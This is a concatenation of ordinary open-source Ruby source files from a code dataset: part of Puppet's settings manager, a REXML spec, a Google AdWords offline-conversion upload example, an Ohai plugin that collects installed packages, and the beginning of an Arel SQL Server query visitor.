raise ArgumentError, _("Setting %{name} is already defined") % { name: name } if @config.include?(name)
tryconfig = newsetting(hash)
short = tryconfig.short
if short
other = @shortnames[short]
if other
raise ArgumentError, _("Setting %{name} is already using short name '%{short}'") % { name: other.name, short: short }
end
@shortnames[short] = tryconfig
end
@config[name] = tryconfig
# Collect the settings that need to have their hooks called immediately.
# We have to collect them so that we can be sure we're fully initialized before
# the hook is called.
if tryconfig.has_hook?
if tryconfig.call_hook_on_define?
call << tryconfig
elsif tryconfig.call_hook_on_initialize?
@hooks_to_call_on_application_initialization |= [ tryconfig ]
end
end
@deprecated_setting_names << name if tryconfig.deprecated?
end
# On-define hooks fire only after every setting in this batch is registered.
call.each do |setting|
setting.handle(self.value(setting.name))
end
end
# Convert the settings we manage into a catalog full of resources that model those settings.
# Only FileSetting entries with a non-nil value are modeled. When +sections+
# are given, the output is restricted to settings from those sections.
def to_catalog(*sections)
  sections = nil if sections.empty?

  catalog = Puppet::Resource::Catalog.new("Settings", Puppet::Node::Environment::NONE)
  @config.keys.find_all { |key| @config[key].is_a?(FileSetting) }.each do |key|
    file = @config[key]
    next if file.value.nil?
    next unless (sections.nil? or sections.include?(file.section))
    resource = file.to_resource
    next unless resource
    # Several settings can point at the same path; keep the first resource.
    next if catalog.resource(resource.ref)

    Puppet.debug {"Using settings: adding file resource '#{key}': '#{resource.inspect}'"}
    catalog.add_resource(resource)
  end

  add_user_resources(catalog, sections)
  add_environment_resources(catalog, sections)

  catalog
end

# Convert our list of config settings into a configuration file.
# Produces a commented header, a section heading for the preferred run
# mode, and one config line per setting (except :genconfig).
def to_config
  str = %{The configuration file for #{Puppet.run_mode.name}. Note that this file
is likely to have unused settings in it; any setting that's
valid anywhere in Puppet can be in any config file, even if it's not used.
Every section can specify three special parameters: owner, group, and mode.
These parameters affect the required permissions of any files specified after
their specification. Puppet will sometimes use these parameters to check its
own configured state, so they can be used to make Puppet a bit more self-managing.
The file format supports octothorpe-commented lines, but not partial-line comments.
Generated on #{Time.now}.
}.gsub(/^/, "# ")

  # Add a section heading that matches our name.
  str += "[#{preferred_run_mode}]\n"
  eachsection do |section|
    persection(section) do |obj|
      str += obj.to_config + "\n" unless obj.name == :genconfig
    end
  end

  return str
end
# Render the settings as a parseable Puppet manifest: every resource in the
# settings catalog serialized via #to_manifest, separated by blank lines.
def to_manifest
  settings_catalog = to_catalog
  manifests = settings_catalog.resource_refs.map do |ref|
    settings_catalog.resource(ref).to_manifest
  end
  manifests.join("\n\n")
end
# Create the necessary objects to use a section. This is idempotent;
# you can 'use' a section as many times as you want.
#
# Builds a RAL catalog for the not-yet-used sections and applies it so the
# files/users/groups backing those settings exist on disk. Raises if the
# catalog cannot be built or if any resource fails during application.
def use(*sections)
  sections = sections.collect { |s| s.to_sym }
  sections = sections.reject { |s| @used.include?(s) }

  return if sections.empty?

  Puppet.debug("Applying settings catalog for sections #{sections.join(', ')}")

  begin
    catalog = to_catalog(*sections).to_ral
  rescue => detail
    Puppet.log_and_raise(detail, "Could not create resources for managing Puppet's files and directories in sections #{sections.inspect}: #{detail}")
  end

  # Mark this as not being a node (host) catalog before applying.
  catalog.host_config = false
  catalog.apply do |transaction|
    if transaction.any_failed?
      report = transaction.report
      status_failures = report.resource_statuses.values.select { |r| r.failed? }
      # Build one message from all failure events across the failed resources.
      status_fail_msg = status_failures.
        collect(&:events).
        flatten.
        select { |event| event.status == 'failure' }.
        collect { |event| "#{event.resource}: #{event.message}" }.join("; ")
      raise "Got #{status_failures.length} failure(s) while initializing: #{status_fail_msg}"
    end
  end

  # Only mark sections as used after a successful apply.
  sections.each { |s| @used << s }
  @used.uniq!
end
# True when +param+ (string or symbol) names a known setting.
def valid?(param)
  @config.key?(param.to_sym)
end
# Retrieve an object that can be used for looking up values of configuration
# settings.
#
# Results are memoized per (environment, section) pair.
#
# @param environment [Symbol] The name of the environment in which to lookup
# @param section [Symbol] The name of the configuration section in which to lookup
# @return [Puppet::Settings::ChainedValues] An object to perform lookups
# @api public
def values(environment, section)
  @values[environment][section] ||= ChainedValues.new(
    section,
    environment,
    value_sets_for(environment, section),
    @config)
end

# Find the correct value using our search path.
#
# @param param [String, Symbol] The value to look up
# @param environment [String, Symbol] The environment to check for the value
# @param bypass_interpolation [true, false] Whether to skip interpolation
#
# @return [Object] The looked up value
#
# @raise [InterpolationError]
def value(param, environment = nil, bypass_interpolation = false)
  # Normalize to symbols; a nil environment stays nil.
  environment &&= environment.to_sym
  value_sym(param.to_sym, environment, bypass_interpolation)
end
# Find the correct value using symbols and our search path.
#
# @param param [Symbol] The value to look up
# @param environment [Symbol] The environment to check for the value
# @param bypass_interpolation [true, false] Whether to skip interpolation
#
# @return [Object] The looked up value
#
# @raise [InterpolationError]
def value_sym(param, environment = nil, bypass_interpolation = false)
  # Check the cache first. It needs to be a per-environment
  # cache so that we don't spread values from one env
  # to another.
  cached_env = @cache[environment || NONE]

  # Avoid two lookups in cache_env unless val is nil. When it is, it's important
  # to check if the key is included so that further processing (that will result
  # in nil again) is avoided.
  val = cached_env[param]
  return val if !val.nil? || cached_env.include?(param)

  # Short circuit to nil for undefined settings.
  return nil unless @config.include?(param)

  vals = values(environment, preferred_run_mode)
  val = bypass_interpolation ? vals.lookup(param) : vals.interpolate(param)
  # Cache even nil results so the resolution above is not repeated.
  cached_env[param] = val
  val
end
##
# (#15337) All of the logic to determine the configuration file to use
# should be centralized into this method. The simplified approach is:
#
# 1. If there is an explicit configuration file, use that. (--confdir or
#    --config)
# 2. If we're running as a root process, use the system puppet.conf
#    (usually /etc/puppetlabs/puppet/puppet.conf)
# 3. Otherwise, use the user puppet.conf (usually ~/.puppetlabs/etc/puppet/puppet.conf)
#
# @api private
# @todo this code duplicates {Puppet::Util::RunMode#which_dir} as described
#   in {https://projects.puppetlabs.com/issues/16637 #16637}
def which_configuration_file
  if explicit_config_file? || Puppet.features.root?
    main_config_file
  else
    user_config_file
  end
end
# This method just turns a file into a new ConfigFile::Conf instance
# @param file [String] absolute path to the configuration file
# @param allowed_sections [Array] section names permitted in this file
# @return [Puppet::Settings::ConfigFile::Conf]
# @api private
def parse_file(file, allowed_sections = [])
  @config_file_parser.parse_file(file, read_file(file), allowed_sections)
end

private

DEPRECATION_REFS = {
  # intentionally empty. This could be repopulated if we deprecate more settings
  # and have reference links to associate with them
}.freeze

# Reject puppet.conf content that sets environment.conf-only settings,
# raising SettingsError and naming every offending setting.
def screen_non_puppet_conf_settings(puppet_conf)
  puppet_conf.sections.values.each do |section|
    forbidden = section.settings.select { |setting| Puppet::Settings::EnvironmentConf::ENVIRONMENT_CONF_ONLY_SETTINGS.include?(setting.name) }
    raise(SettingsError, "Cannot set #{forbidden.map { |s| s.name }.join(", ")} settings in puppet.conf") if !forbidden.empty?
  end
end
# Record which settings configured in puppet.conf are deprecated, so that a
# warning can be issued later in application initialization — once settings
# are bootstrapped far enough to honor Puppet[:disable_warnings].
#
# Only settings set in puppet.conf itself are considered.
def record_deprecations_from_puppet_conf(puppet_conf)
  configured = puppet_conf.sections.values.flat_map(&:settings)
  configured.each do |conf_setting|
    known = self.setting(conf_setting.name)
    next unless known && known.deprecated?
    @deprecated_settings_that_have_been_configured << known
  end
end
# Emit one deprecation warning per setting recorded by
# record_deprecations_from_puppet_conf.
def issue_deprecations
  @deprecated_settings_that_have_been_configured.each { |deprecated| issue_deprecation_warning(deprecated) }
end
# Emit a single deprecation warning for +setting+. When +msg+ is supplied it
# is used verbatim (with any matching reference link appended); otherwise the
# message depends on whether the setting is deprecated everywhere or only in
# puppet.conf. The second argument to Puppet.deprecation_warning is a
# per-setting key (presumably used to de-duplicate repeated warnings —
# confirm against Puppet.deprecation_warning).
def issue_deprecation_warning(setting, msg = nil)
  name = setting.name
  ref = DEPRECATION_REFS.find { |params,reference| params.include?(name) }
  ref = ref[1] if ref   # Hash#find yields a [key, value] pair; keep the reference text
  case
  when msg
    msg << " #{ref}" if ref   # NOTE: mutates the caller's string in place
    Puppet.deprecation_warning(msg)
  when setting.completely_deprecated?
    message = _("Setting %{name} is deprecated.") % { name: name }
    message += " #{ref}"
    Puppet.deprecation_warning(message, "setting-#{name}")
  when setting.allowed_on_commandline?
    #TRANSLATORS 'puppet.conf' is a file name and should not be translated
    message = _("Setting %{name} is deprecated in puppet.conf.") % { name: name }
    message += " #{ref}"
    Puppet.deprecation_warning(message, "puppet-conf-setting-#{name}")
  end
end
# Add a directory resource for the configured "production" environment to
# +catalog+ so it exists under the first environmentpath entry. Skipped when
# the environment is not "production", when the path is already a symlink
# (assumed to be managed elsewhere), or when envdir does not exist.
# +sections+ is accepted for signature parity but not consulted here.
def add_environment_resources(catalog, sections)
  path = self[:environmentpath]
  # environmentpath can list several directories; only the first is managed.
  envdir = path.split(File::PATH_SEPARATOR).first if path
  configured_environment = self[:environment]
  if configured_environment == "production" && envdir && Puppet::FileSystem.exist?(envdir)
    configured_environment_path = File.join(envdir, configured_environment)
    # If configured_environment_path is a symlink, assume the source path is being managed
    # elsewhere, so don't do any of this configuration
    if !Puppet::FileSystem.symlink?(configured_environment_path)
      parameters = { :ensure => 'directory' }
      # Only set ownership/mode when creating the directory fresh.
      unless Puppet::FileSystem.exist?(configured_environment_path)
        parameters[:mode] = '0750'
        if Puppet.features.root?
          parameters[:owner] = Puppet[:user] if service_user_available?
          parameters[:group] = Puppet[:group] if service_group_available?
        end
      end
      catalog.add_resource(Puppet::Resource.new(:file, configured_environment_path, :parameters => parameters))
    end
  end
end

# Add user/group resources for the owners/groups referenced by file settings
# in +sections+ (all sections when nil). Only runs as root on non-Windows
# hosts and only when :mkusers is enabled. "root"/"wheel" are never managed.
def add_user_resources(catalog, sections)
  return unless Puppet.features.root?
  return if Puppet::Util::Platform.windows?
  return unless self[:mkusers]

  @config.each do |name, setting|
    next unless setting.respond_to?(:owner)
    next unless sections.nil? or sections.include?(setting.section)

    user = setting.owner
    if user && user != "root" && catalog.resource(:user, user).nil?
      resource = Puppet::Resource.new(:user, user, :parameters => {:ensure => :present})
      resource[:gid] = self[:group] if self[:group]
      catalog.add_resource resource
    end

    group = setting.group
    if group && ! %w{root wheel}.include?(group) && catalog.resource(:group, group).nil?
      catalog.add_resource Puppet::Resource.new(:group, group, :parameters => {:ensure => :present})
    end
  end
end
# Yield each search source in turn.
# Maps every entry of the search path to its value set, dropping sources
# that resolve to nil.
def value_sets_for(environment, mode)
  searchpath(environment, mode).collect { |source| searchpath_values(source) }.compact
end

# Read the file in.
# @param file [String] absolute path to the file
# @return [String] the file contents, decoded as UTF-8
# @api private
def read_file(file)
  return Puppet::FileSystem.read(file, :encoding => 'utf-8')
end
# Private method for internal test use only; allows to do a comprehensive clear of all settings between tests.
#
# Resets parsed configuration state and both initialization flags, so global
# and application defaults must be re-established afterwards.
#
# @return nil
def clear_everything_for_tests()
  unsafe_clear(true, true)
  @configuration_file = nil
  @global_defaults_initialized = false
  @app_defaults_initialized = false
end
private :clear_everything_for_tests

# Returns true when the user has provided an explicit configuration file
# (directly or via --confdir), false otherwise.
def explicit_config_file?
  # The easiest way to determine whether an explicit one has been specified
  # is to simply attempt to evaluate the value of ":config". This will
  # obviously be successful if they've passed an explicit value for :config,
  # but it will also result in successful interpolation if they've only
  # passed an explicit value for :confdir.
  #
  # If they've specified neither, then the interpolation will fail and we'll
  # get an exception.
  #
  begin
    return true if self[:config]
  rescue InterpolationError
    # This means we failed to interpolate, which means that they didn't
    # explicitly specify either :config or :confdir... so we'll fall out to
    # the default value.
    return false
  end
end
private :explicit_config_file?
# Lookup configuration setting value through a chain of different value sources.
#
# @api public
class ChainedValues
  ENVIRONMENT_SETTING = "environment".freeze
  # Settings that may legitimately interpolate $environment.
  ENVIRONMENT_INTERPOLATION_ALLOWED = ['config_version'].freeze

  # @see Puppet::Settings.values
  # @api private
  def initialize(mode, environment, value_sets, defaults)
    @mode = mode
    @environment = environment
    @value_sets = value_sets   # searched in order; first set containing the name wins
    @defaults = defaults
  end

  # Lookup the uninterpolated value.
  #
  # Scans the value sets in order; the first non-nil hit wins, otherwise the
  # setting's default is returned. NOTE: raises NoMethodError for a name not
  # present in @defaults (callers like #interpolate guard against this).
  #
  # @param name [Symbol] The configuration setting name to look up
  # @return [Object] The configuration setting value or nil if the setting is not known
  # @api public
  def lookup(name)
    set = @value_sets.find do |value_set|
      value_set.include?(name)
    end
    if set
      value = set.lookup(name)
      if !value.nil?
        return value
      end
    end
    @defaults[name].default
  end

  # Lookup the interpolated value. All instances of `$name` in the value will
  # be replaced by performing a lookup of `name` and substituting the text
  # for `$name` in the original value. This interpolation is only performed
  # if the looked up value is a String.
  #
  # @param name [Symbol] The configuration setting name to look up
  # @return [Object] The configuration setting value or nil if the setting is not known
  # @api public
  def interpolate(name)
    setting = @defaults[name]
    return nil unless setting

    lookup_and_convert(name) do |val|
      setting.munge(val)   # apply the setting's own value coercion
    end
  end

  # Like #interpolate, but formats the value via the setting's #print.
  def print(name)
    setting = @defaults[name]
    return nil unless setting

    lookup_and_convert(name) do |val|
      setting.print(val)
    end
  end

  private

  # Shared lookup + interpolation pipeline; yields the converted value.
  # The :code setting is passed through untouched.
  def lookup_and_convert(name, &block)
    val = lookup(name)
    # if we interpolate code, all hell breaks loose.
    if name == :code
      val
    else
      # Convert it if necessary
      begin
        val = convert(val, name)
      rescue InterpolationError => err
        # This happens because we don't have access to the param name when the
        # exception is originally raised, but we want it in the message
        raise InterpolationError, _("Error converting value for param '%{name}': %{detail}") % { name: name, detail: err }, err.backtrace
      end

      yield val
    end
  end

  # Expand $var / ${var} references in String values. $environment is only
  # expanded for settings listed in ENVIRONMENT_INTERPOLATION_ALLOWED;
  # otherwise the expression is left verbatim and a warning is logged.
  # Unknown variables raise InterpolationError. Non-string values pass
  # through untouched.
  def convert(value, setting_name)
    case value
    when nil
      nil
    when String
      failed_environment_interpolation = false
      interpolated_value = value.gsub(/\$(\w+)|\$\{(\w+)\}/) do |expression|
        # $1 captures the bare form ($var), $2 the braced form (${var}).
        varname = $2 || $1
        interpolated_expression =
          if varname != ENVIRONMENT_SETTING || ok_to_interpolate_environment(setting_name)
            if varname == ENVIRONMENT_SETTING && @environment
              @environment
            elsif varname == "run_mode"
              @mode
            elsif !(pval = interpolate(varname.to_sym)).nil?
              # Recursive interpolation of another setting's value.
              pval
            else
              raise InterpolationError, _("Could not find value for %{expression}") % { expression: expression }
            end
          else
            failed_environment_interpolation = true
            expression
          end
        interpolated_expression
      end
      if failed_environment_interpolation
        #TRANSLATORS '$environment' is a Puppet specific variable and should not be translated
        Puppet.warning(_("You cannot interpolate $environment within '%{setting_name}' when using directory environments.") % { setting_name: setting_name } +
                       ' ' + _("Its value will remain %{value}.") % { value: interpolated_value })
      end
      interpolated_value
    else
      value
    end
  end

  def ok_to_interpolate_environment(setting_name)
    ENVIRONMENT_INTERPOLATION_ALLOWED.include?(setting_name.to_s)
  end
end
# A mutable bag of explicitly-assigned setting values (e.g. one config-file
# section or the CLI), validated against the setting definitions.
class Values
  extend Forwardable

  attr_reader :name

  # @param name [Symbol] identifier of this value source
  # @param defaults [Hash] setting definitions, used to validate assignments
  #   and to run per-setting hooks
  def initialize(name, defaults)
    @name = name
    @values = {}
    @defaults = defaults
  end

  def_delegator :@values, :include?
  def_delegator :@values, :[], :lookup

  # Assign +value+ to setting +name+, invoking the setting's hook (if any).
  # Raises ArgumentError for unknown settings. If the hook raises, the
  # previous value is restored before the exception propagates.
  def set(name, value)
    default = @defaults[name]

    if !default
      raise ArgumentError, _("Attempt to assign a value to unknown setting %{name}") % { name: name.inspect }
    end

    # This little exception-handling dance ensures that a hook is
    # able to check whether a value for itself has been explicitly
    # set, while still preserving the existing value if the hook
    # throws (as was existing behavior)
    old_value = @values[name]
    @values[name] = value
    begin
      if default.has_hook?
        default.handle(value)
      end
    rescue Exception => e
      @values[name] = old_value
      raise e
    end
  end

  def inspect
    %Q{<#{self.class}:#{self.object_id} @name="#{@name}" @values="#{@values}">}
  end
end
# Read-only value source backed by one parsed config-file section.
class ValuesFromSection
  attr_reader :name

  # @param name [Symbol] identifier for this value source
  # @param section [Object] parsed section responding to #setting(name)
  def initialize(name, section)
    @name = name
    @section = section
  end

  # True when the wrapped section defines a setting by this name.
  def include?(name)
    @section.setting(name) != nil
  end

  # The section's value for +name+, or nil when the section has no such
  # setting.
  def lookup(name)
    found = @section.setting(name)
    found && found.value
  end

  def inspect
    "<#{self.class}:#{object_id} @name=\"#{@name}\" @section=\"#{@section}\">"
  end
end
# Read-only value source backed by an environment.conf, exposing only the
# settings an environment is allowed to override.
# @api private
class ValuesFromEnvironmentConf
  def initialize(environment_name)
    @environment_name = environment_name
  end

  def name
    @environment_name
  end

  # True only for environment-overridable settings when a conf is resolvable.
  def include?(name)
    Puppet::Settings::EnvironmentConf::VALID_SETTINGS.include?(name) && !conf.nil?
  end

  def lookup(name)
    return nil unless Puppet::Settings::EnvironmentConf::VALID_SETTINGS.include?(name)

    loaded = conf
    loaded.send(name) if loaded
  end

  # Lazily resolve (and memoize) the environment's conf object; retried on
  # each call while the environments service or the conf is unavailable.
  def conf
    @conf ||= begin
      environments = Puppet.lookup(:environments) { nil }
      environments ? environments.get_conf(@environment_name) : nil
    end
  end

  def inspect
    "<#{self.class}:#{object_id} @environment_name=\"#{@environment_name}\" @conf=\"#{@conf}\">"
  end
end
end
| 33.434923 | 161 | 0.681024 |
e963137d05cbe59b3911e6aa86e90e5037f275fe | 212 | require File.dirname(__FILE__) + '/../../../spec_helper'
require File.dirname(__FILE__) + '/shared/to_s'
require 'rexml/document'
# REXML::CData#value is specified via the shared :rexml_cdata_to_s examples,
# parameterized with the method under test (:value).
describe "REXML::CData#value" do
  it_behaves_like :rexml_cdata_to_s, :value
end
f8ef11b0957eda78fd8992a65da1dbbb3b0bce7f | 4,256 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright:: Copyright 2013, Google Inc. All Rights Reserved.
#
# License:: Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This code example imports offline conversion values for specific clicks to
# your account. To get Google Click ID for a click, run
# CLICK_PERFORMANCE_REPORT. To set up a conversion tracker, run the
# add_conversion_trackers.rb example.
require 'adwords_api'
require 'date'
# Upload a single offline conversion to the named conversion tracker and
# print the values the API echoes back.
#
# Args:
# - conversion_name: name of an existing conversion tracker.
# - google_click_id: gclid of the click the conversion is attributed to.
# - conversion_time: conversion timestamp ('yyyymmdd hhmmss' format).
# - conversion_value: numeric value to record for the conversion.
def upload_offline_conversions(conversion_name, google_click_id,
    conversion_time, conversion_value)
  # AdwordsApi::Api reads ENV['HOME']/adwords_api.yml when constructed with
  # no arguments. To log SOAP requests, set log_level to 'DEBUG' there or
  # assign a logger: api.logger = Logger.new('adwords_xml.log')
  api = AdwordsApi::Api.new
  service = api.service(:OfflineConversionFeedService, API_VERSION)

  # The tracker must already exist; a newly created tracker may take a few
  # hours before it accepts conversions.
  operand = {
    :conversion_name => conversion_name,
    :google_click_id => google_click_id,
    :conversion_time => conversion_time,
    :conversion_value => conversion_value
  }
  # Optional: for fractional conversion credits, set an external attribution
  # model and credit on an externally attributed tracker, e.g.:
  #   operand[:external_attribution_model] = "Linear"
  #   operand[:external_attribution_credit] = 0.3
  # See https://developers.google.com/adwords/api/docs/guides/conversion-tracking#importing_externally_attributed_conversions

  response = service.mutate([{:operator => 'ADD', :operand => operand}])
  response[:value].each do |uploaded|
    puts "Uploaded offline conversion value %.2f for Google Click ID '%s', to %s" %
        [uploaded[:conversion_value],
         uploaded[:google_click_id],
         uploaded[:conversion_name]]
  end
end
# Script entry point: fill in the INSERT_* placeholders before running.
if __FILE__ == $0
  API_VERSION = :v201710

  begin
    # Name of the conversion tracker to upload to.
    conversion_name = 'INSERT_CONVERSION_NAME_HERE'
    # Google Click ID of the click for which offline conversions are uploaded.
    google_click_id = 'INSERT_GOOGLE_CLICK_ID_HERE'
    # Conversion time in 'yyyymmdd hhmmss' format.
    conversion_time = Time.new.strftime("%Y%m%d %H%M%S")
    # Conversion value to be uploaded.
    conversion_value = 'INSERT_CONVERSION_VALUE_HERE'.to_f

    upload_offline_conversions(conversion_name, google_click_id,
                               conversion_time, conversion_value)

  # Authorization error.
  rescue AdsCommon::Errors::OAuth2VerificationRequired => e
    puts "Authorization credentials are not valid. Edit adwords_api.yml for " +
        "OAuth2 client ID and secret and run misc/setup_oauth2.rb example " +
        "to retrieve and store OAuth2 tokens."
    puts "See this wiki page for more details:\n\n  " +
        'https://github.com/googleads/google-api-ads-ruby/wiki/OAuth2'

  # HTTP errors.
  rescue AdsCommon::Errors::HttpError => e
    puts "HTTP Error: %s" % e

  # API errors: print every error with its field/value details.
  rescue AdwordsApi::Errors::ApiException => e
    puts "Message: %s" % e.message
    puts 'Errors:'
    e.errors.each_with_index do |error, index|
      puts "\tError [%d]:" % (index + 1)
      error.each do |field, value|
        puts "\t\t%s: %s" % [field, value]
      end
    end
  end
end
| 39.045872 | 121 | 0.700188 |
01cf210e3d09f460fa5cb842069af28daadb1734 | 4,971 | # Author:: "Christian Höltje" <[email protected]>
# Author:: "Christopher M. Luciano" <[email protected]>
# Author:: Shahul Khajamohideen (<[email protected]>)
# Copyright (C) 2015 IBM Corp.
# Copyright (C) 2015 Bloomberg Finance L.P.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Ohai plugin collecting installed-package data into the +packages+ mash,
# keyed by package name, across Linux, Windows, AIX, FreeBSD and Solaris.
Ohai.plugin(:Packages) do
  provides "packages"
  depends "platform_family"

  # Maps Windows registry value names to the attribute names used in the
  # packages mash.
  WINDOWS_ATTRIBUTE_ALIASES = {
    "DisplayVersion" => "version",
    "Publisher" => "publisher",
    "InstallDate" => "installdate",
  } unless defined?(WINDOWS_ATTRIBUTE_ALIASES)

  collect_data(:linux) do
    packages Mash.new
    if %w{debian}.include? platform_family
      # dpkg-query emits one "name<TAB>version<TAB>arch" line per package.
      format = '${Package}\t${Version}\t${Architecture}\n'
      so = shell_out("dpkg-query -W -f='#{format}'")
      pkgs = so.stdout.lines

      pkgs.each do |pkg|
        name, version, arch = pkg.split
        packages[name] = { "version" => version, "arch" => arch }
      end

    elsif %w{rhel fedora suse pld}.include? platform_family
      # rpm query format; epoch defaults to 0 when the package has none.
      format = '%{NAME}\t%|EPOCH?{%{EPOCH}}:{0}|\t%{VERSION}\t%{RELEASE}\t%{INSTALLTIME}\t%{ARCH}\n'
      so = shell_out("rpm -qa --qf '#{format}'")
      pkgs = so.stdout.lines

      pkgs.each do |pkg|
        name, epoch, version, release, installdate, arch = pkg.split
        packages[name] = { "epoch" => epoch, "version" => version, "release" => release, "installdate" => installdate, "arch" => arch }
      end
    end
  end

  # Collect installed programs listed under one "Uninstall" registry key.
  # Entries without a DisplayName are skipped; per-value read errors are
  # swallowed (rescue nil) so a single bad entry cannot abort the scan.
  def collect_programs_from_registry_key(key_path)
    # from http://msdn.microsoft.com/en-us/library/windows/desktop/aa384129(v=vs.85).aspx
    # 0x100 / 0x200 select a WOW64 registry view per the linked MSDN page.
    if ::RbConfig::CONFIG["target_cpu"] == "i386"
      reg_type = Win32::Registry::KEY_READ | 0x100
    elsif ::RbConfig::CONFIG["target_cpu"] == "x86_64"
      reg_type = Win32::Registry::KEY_READ | 0x200
    else
      reg_type = Win32::Registry::KEY_READ
    end
    Win32::Registry::HKEY_LOCAL_MACHINE.open(key_path, reg_type) do |reg|
      reg.each_key do |key, _wtime|
        # NOTE(review): subkeys opened here are never explicitly closed;
        # appears to rely on GC/finalizers — confirm this is acceptable.
        pkg = reg.open(key)
        name = pkg["DisplayName"] rescue nil
        next if name.nil?
        package = packages[name] = Mash.new
        WINDOWS_ATTRIBUTE_ALIASES.each do |registry_attr, package_attr|
          value = pkg[registry_attr] rescue nil
          package[package_attr] = value unless value.nil?
        end
      end
    end
  end

  collect_data(:windows) do
    require "win32/registry"
    packages Mash.new
    collect_programs_from_registry_key('Software\Microsoft\Windows\CurrentVersion\Uninstall')
    # on 64 bit systems, 32 bit programs are stored here
    collect_programs_from_registry_key('Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall')
  end

  collect_data(:aix) do
    packages Mash.new
    so = shell_out("lslpp -L -q -c")
    pkgs = so.stdout.lines

    # Output format is
    # Package Name:Fileset:Level
    # On aix, filesets are packages and levels are versions
    pkgs.each do |pkg|
      _, name, version = pkg.split(":")
      packages[name] = { "version" => version }
    end
  end

  collect_data(:freebsd) do
    packages Mash.new
    so = shell_out('pkg query -a "%n %v"')
    # Output format is
    # name version
    so.stdout.lines do |pkg|
      name, version = pkg.split(" ")
      packages[name] = { "version" => version }
    end
  end

  # Collect packages from the Solaris IPS packaging system.
  def collect_ips_packages
    so = shell_out("pkg list -H")
    # Output format is
    # NAME (PUBLISHER) VERSION IFO
    so.stdout.lines.each do |pkg|
      tokens = pkg.split
      if tokens.length == 3 # No publisher info
        name, version, = tokens
      else
        name, publisher, version, = tokens
        publisher = publisher[1..-2]   # strip the surrounding parentheses
      end
      packages[name] = { "version" => version }
      packages[name]["publisher"] = publisher if publisher
    end
  end

  # Collect packages from the legacy SysV packaging system.
  def collect_sysv_packages
    so = shell_out("pkginfo -l")
    # Each package info is separated by a blank line
    chunked_lines = so.stdout.lines.map(&:strip).chunk do |line|
      !line.empty? || nil   # nil chunks (blank lines) are dropped by #chunk
    end
    chunked_lines.each do |_, lines|
      package = {}
      lines.each do |line|
        key, value = line.split(":", 2)
        package[key.strip.downcase] = value.strip unless value.nil?
      end
      # pkginst is the installed package name
      packages[package["pkginst"]] = package.tap do |p|
        p.delete("pkginst")
      end
    end
  end

  collect_data(:solaris2) do
    packages Mash.new
    collect_ips_packages
    collect_sysv_packages
  end
end
ed750b1bbef744518800b8ebdd662461c8cb21b6 | 11,848 | require 'arel'
require 'arel/select_manager_sqlserver'
module Arel
module Nodes
  # Extends Ordering to be comparison friendly, which allows calling #uniq
  # on a collection of orderings. See SelectManager#order for details.
  class Ordering < Arel::Nodes::Unary
    # Orderings over the same expression hash identically.
    def hash
      expr.hash
    end

    def ==(other)
      other.is_a?(Arel::Nodes::Ordering) && expr == other.expr
    end

    # eql? must agree with #hash / #== for Hash- and uniq-based deduplication.
    alias_method :eql?, :==
  end
end
module Visitors
class SQLServer < Arel::Visitors::ToSql
private
# SQLServer ToSql/Visitor (Overrides)
# Entry point for SELECT statements. Dispatches to one of three SQL Server
# specific builders: the COUNT-over-rowtable form, the ROW_NUMBER()-windowed
# form when an OFFSET is present, or the plain TOP-based form.
def visit_Arel_Nodes_SelectStatement(o, a)
  return visit_Arel_Nodes_SelectStatementForComplexCount(o, a) if complex_count_sql?(o)
  return visit_Arel_Nodes_SelectStatementWithOffset(o, a) if o.offset

  visit_Arel_Nodes_SelectStatementWithOutOffset(o, a)
end
def visit_Arel_Nodes_UpdateStatement(o, a)
  # An UPDATE with ORDER BY needs a TOP clause on SQL Server; use the max
  # bigint value (2**63 - 1) as an effectively unlimited row count.
  if o.orders.any? && o.limit.nil?
    o.limit = Nodes::Limit.new(9223372036854775807)
  end
  super
end

# OFFSET is emulated via the [__rn] ROW_NUMBER() column of the derived
# [__rnt] rowtable built by the windowed SELECT.
def visit_Arel_Nodes_Offset(o, a)
  "WHERE [__rnt].[__rn] > (#{visit o.expr})"
end

# LIMIT maps to SQL Server's TOP (n).
def visit_Arel_Nodes_Limit(o, a)
  "TOP (#{visit o.expr})"
end

# The lock node's expression supplies the hint text verbatim.
def visit_Arel_Nodes_Lock(o, a)
  visit o.expr
end

def visit_Arel_Nodes_Ordering(o, a)
  # Orderings without a #direction are bare expressions; emit them as-is.
  if o.respond_to?(:direction)
    "#{visit o.expr} #{o.ascending? ? 'ASC' : 'DESC'}"
  else
    visit o.expr
  end
end

# Append the adapter's case-sensitive collation equality operator.
def visit_Arel_Nodes_Bin(o, a)
  "#{visit o.expr} #{@connection.cs_equality_operator}"
end
# SQLServer ToSql/Visitor (Additions)

# TOP-based SELECT used when no OFFSET is present. When +windowed+ is true
# the fragment is embedded inside a ROW_NUMBER() derived table and must not
# emit SELECT / TOP / ORDER BY itself.
def visit_Arel_Nodes_SelectStatementWithOutOffset(o, a, windowed = false)
  find_and_fix_uncorrelated_joins_in_select_statement(o)
  core = o.cores.first
  projections = core.projections
  groups = core.groups
  orders = o.orders.uniq

  if windowed
    # Inside a window, bare expressions must stay selectable column names.
    projections = function_select_statement?(o) ? projections : projections.map { |x| projection_without_expression(x) }
    groups = projections.map { |x| projection_without_expression(x) } if windowed_single_distinct_select_statement?(o) && groups.empty?
    groups += orders.map { |x| Arel.sql(x.expr) } if windowed_single_distinct_select_statement?(o)
  elsif eager_limiting_select_statement?(o)
    # DISTINCT + LIMIT: emulate via GROUP BY with MIN/MAX-wrapped orders.
    projections = projections.map { |x| projection_without_expression(x) }
    groups = projections.map { |x| projection_without_expression(x) }
    orders = orders.map do |x|
      expr = Arel.sql projection_without_expression(x.expr)
      x.descending? ? Arel::Nodes::Max.new([expr]) : Arel::Nodes::Min.new([expr])
    end
